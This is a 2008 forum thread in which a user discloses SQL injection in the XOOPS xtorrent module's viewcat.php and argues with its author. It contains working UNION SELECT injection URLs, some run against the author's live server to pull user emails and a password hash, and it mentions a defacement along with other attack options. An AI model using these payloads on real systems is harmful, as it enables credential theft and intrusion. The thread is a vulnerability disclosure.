1
Anonymous
Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 18:28

  • Anonymous

  • Posts: 0

  • Since:


despite being called and belittled by xtorrent author wishcraft, and his statement that I am being paranoid and don't know what i'm talking about.

Xtorrent module is vulnerable to SQL injection.

and yes i do know what $_GET & $HTTP_GET_VARS are.. long vars are deprecated btw ;)

viewcat.php is vulnerable to injection because input is not correctly sanitized.

I'm not a drama queen like wishcraft.

you try to offer advice & you get met with hostility.. why should anyone bother reporting security vulnerabilities instead of just hacking you all the time.

proof of concept >

http://www.domain.com/modules/xtorrent/viewcat.php?cid=999%20un_ion%20select%20uname,null,null,null,null,null%20from%20xoops_users%20where%20uid=1


the above will display the username of uid =1 when u type that into the address bar by injecting sql into viewcat.

the mere fact that you get a result means the module is vulnerable. usernae is not the only thing that can be grabbed, password hashes or anything from any table can easily be retrieved by crafting a url similar to above or even more so when using concat().

now wishcraft please tell me i'm being paranoid.

ps. remove the _ underscore from un_ion

also that is just 1 exploit, there are more files and more $variables etc that can be exploited in the module.

2
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Well Vaughan from ImpressCMS, if that is even your real name.. I don't know I have been reading reports that someone is trying to funnel even my donation to Xoops.org from xoops... Thats why I am friend with xoops..

Well i tryed your vunrability and several other and all they seem to produce is a blank page on the cms...

Hey everyone try it on my development server

http://www.unseen.org.au/modules/xtorrent/viewcat.php?cid=1%20un_ion%20select%20uname,null,null,null,null,null%20from%20xoops_users%20where%20uid=1


Wouldn't if you are from ImpressCMS like your email states, with this link, already have a username on xoops? Or be on of the banned people.

All it seems to do is produce a blank result.. It doesn't display anything?>?

Your a script kiddy congradulations. I have been programming for 20 years, more or less in the compilers not scripting languages like PHP.. And SQL injestion is something that exist in most libraries, somehow the other side of the system will counter for it, like the need for a smarty variable to display the data or a textbox... If this doesn't exist then it not a problem..

If you want to get involved with the x-torrent project then do so -- make an application at http://www.sourceforge.org/project/x-Torrent/ but otherwise, don't contact me again thank Vaughan


Btw, you still haven't answer my question.. That if this was such a problem why do poeple do URL paths like this:

http://www.bankfees.net.au/forums/Credit_Unions/Credit_Unions/

or

http://www.bankfees.net.au/forums/Credit_Unions

and so on.
Resized Image
http://www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/RegaltyFamily
github.com/Chronolabs-Cooperative
facebook.com/DrAntonyRoberts

3
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 21:50

  • Anonymous

  • Posts: 0

  • Since:


1st off lets give u a bit of a lesson.

it's a general sql query.

change xoops_users to match your db prefix ie. ergherhg_users

2ndly if you have protector installed, then disable it to check, otherwise protector will ban you.

i thought you were an expert.

and please don't say well protector will protect you. trusting that people have protector installed is not an excuse to not fix unsanitized code.

and before you say again, that if a hacker doesn't know your db prefix then it won't work, i can easily craft a union query from the above in order to produce an error which will give me the prefix of your tables..

and yes i am vaughan. and yes my name is vaughan montgomery. hence m0nty.

my other accounts 'vaughan' & m0nty are banned from posting on here at my own personal request!! but i thought i'd re register here in order to prove a point to yourself.

script kiddie? aren't we all script kiddies.. even tho i'm 33 yrs old.

Quote:

Btw, you still haven't answer my question.. That if this was such a problem why do poeple do URL paths like this:

http://www.bankfees.net.au/forums/Credit_Unions/Credit_Unions/

or

http://www.bankfees.net.au/forums/Credit_Unions

and so on.


why? because it's better for SEO and it's also easier on the eyes and memory, but has nothing to do with preventing sql injection.

4
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Sorry Vaughan I am going to have to do you in the full monty here.

http://www.unseen.org.au/modules/xtorrent/viewcat.php?cid=1%20un_ion%20select%20uname,null,null,null,null,null%20from%20_unseen2_users%20where%20uid=1


doesn't do a thing on the server, just displays this:

Resized Image

Absolutely nothing, I tried you example with the other files in the system and still absolutely nothing that was critical..

Mind you vaughan I am not saying I am not going to fix the example you have put up, but I am not going to do it immediately, I have some changes to make to the system anyway..

I tell you what if you can do a hack that is through the URL remove the image that shows how your example just display a blank page that does nothing, then I will find that amuzing.
Resized Image
http://www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/RegaltyFamily
github.com/Chronolabs-Cooperative
facebook.com/DrAntonyRoberts

5
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Quote:

Quote:

Btw, you still haven't answer my question.. That if this was such a problem why do poeple do URL paths like this:

http://www.bankfees.net.au/forums/Credit_Unions/Credit_Unions/

or

http://www.bankfees.net.au/forums/Credit_Unions

and so on.


why? because it's better for SEO and it's also easier on the eyes and memory, but has nothing to do with preventing sql injection.


But Vaughan, you see the SQL Injection problem happens again like
http://www.bankfees.net.au/forums/Credit_Unions"%20union%20select%20uname,null,null,null,null,null%20from%20xoops_users%20where%20uid=1/

Luckly I SEF it before parsing it so it doesn't do anything, perhaps you should stick to something that does the programming for you monty like ruby on rails or something.
Resized Image
http://www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/RegaltyFamily
github.com/Chronolabs-Cooperative
facebook.com/DrAntonyRoberts

6
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 22:29

  • Anonymous

  • Posts: 0

  • Since:


is uid=1 called cej?

i'm just tinkering and haven't used any concat or anything..

but i retrieve an md5 hash of '******************'

email address > *************

edited by vaughan > removed hash & email as demo is over.

http://www.unseen.org.au/modules/xtorrent/viewcat.php?cid=999%20un_ion%20select%20email,null,null,null,null,null%20from%20_unseen2_users%20where%20uid=1



and remember to remove the _ underscore from union. (i add _ here on forums so protector doesn't ban me.

Resized Image

7
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Yeah but I still want to see you remove the image that shows that it is blank!! Thats a hack... Retrieving some details isn't really a hack, beside I don't run protector on that system.

Alright Vaughan just for you, don't you feel special, I will fix it, but after my days work is finished.

But you still haven't answered my question about the domain path, it had nothing to do with SEO'n that is just the interum..

So I will ask it again:

If SQL Injestion was such a problem why do people make domains like the ones you can see on bankfees.net.au?

They are dynamic and there is no reprogramming of the .htaccess file to make them work.. It is all dynamic to the user content.
Resized Image
http://www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/RegaltyFamily
github.com/Chronolabs-Cooperative
facebook.com/DrAntonyRoberts

8
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 23:05

  • Anonymous

  • Posts: 0

  • Since:


why? who cares. the point in question is that xtorrent module has a security issue.

what can be done with an md5 hash? rainbow keys anyone?

or construct a new query which will update table xoops_users and set pass='**********' where uid=1. which is injected into the url.

or use XSS and construct a script which will just grab your cookie details and allow to login that way. really there are numerous possibilities, from manipulating tables, deleting them, even closing down the MySQL server or executing shell commands.

really you need to understand sql injection a lot more. i'm not going to do it to you, but i am making sure that you realise what can potentially be done!!!

9
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Ok vaughan, just for you I fixed this morning, before work starts..

The new CRC32 for x-torrent 1.30Rc is

md5: 537bcdc64a6c397d52b35ad2b7d3281c

crc32: 5b763615
Resized Image
http://www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/RegaltyFamily
github.com/Chronolabs-Cooperative
facebook.com/DrAntonyRoberts

10
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 23:26

  • Anonymous

  • Posts: 0

  • Since:


don't do it for me, do it for your users, they're the ones that need to feel secure.

btw, check your homepage of your dev site.

that's how easy it is once i retrieved the db hash etc.

Resized Image

Login

Who's Online

381 user(s) are online (278 user(s) are browsing Support Forums)


Members: 0


Guests: 381


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits